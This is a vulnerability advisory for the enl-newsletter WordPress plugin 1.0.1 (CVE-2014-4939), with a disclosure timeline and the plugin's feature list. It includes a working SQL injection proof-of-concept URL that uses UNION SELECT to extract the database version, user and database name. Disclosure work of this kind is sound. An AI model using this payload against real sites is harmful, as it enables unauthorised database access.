wp-plugin : enl-newsletter – A1-Injection


Plugin Details


Plugin Name : enl-newsletter


Effected Version : 1.0.1 (and most probably lower version's if any)

Vulnerability : A1-Injection
Identified by : Anant Shrivastava



Technical Details


Minimum Level of Access Required : Administrator


PoC - (Proof of Concept) :


http://localhost/wp-admin/admin.php?page=enl-add-new&id=2 union select 1,@@version,3,user(),database(),6,7,8,9,0,1


Disclosure Timeline


Vendor Contacted : 2013-12-28

Plugin Status : No Change
Public Disclosure : May 28, 2014
CVE Number : CVE-2014-4939

Plugin Description :
**Main Features:**

1. Setup multiple newsletters according to the post categories.
2. Different send modes include manual, weekly and monthly.
3. Custom newsletter content, template and post count.
4. Newsletter signup widget for user registration.
5. Subscriber info list containing email, ip and registeration time.
6. Import wordpress users to subscriber list.

**More info:**

* [Leave a comment](http://www.wp-coder.net/enl-newsletter/)

Leave a Reply

Your email address will not be published. Required fields are marked *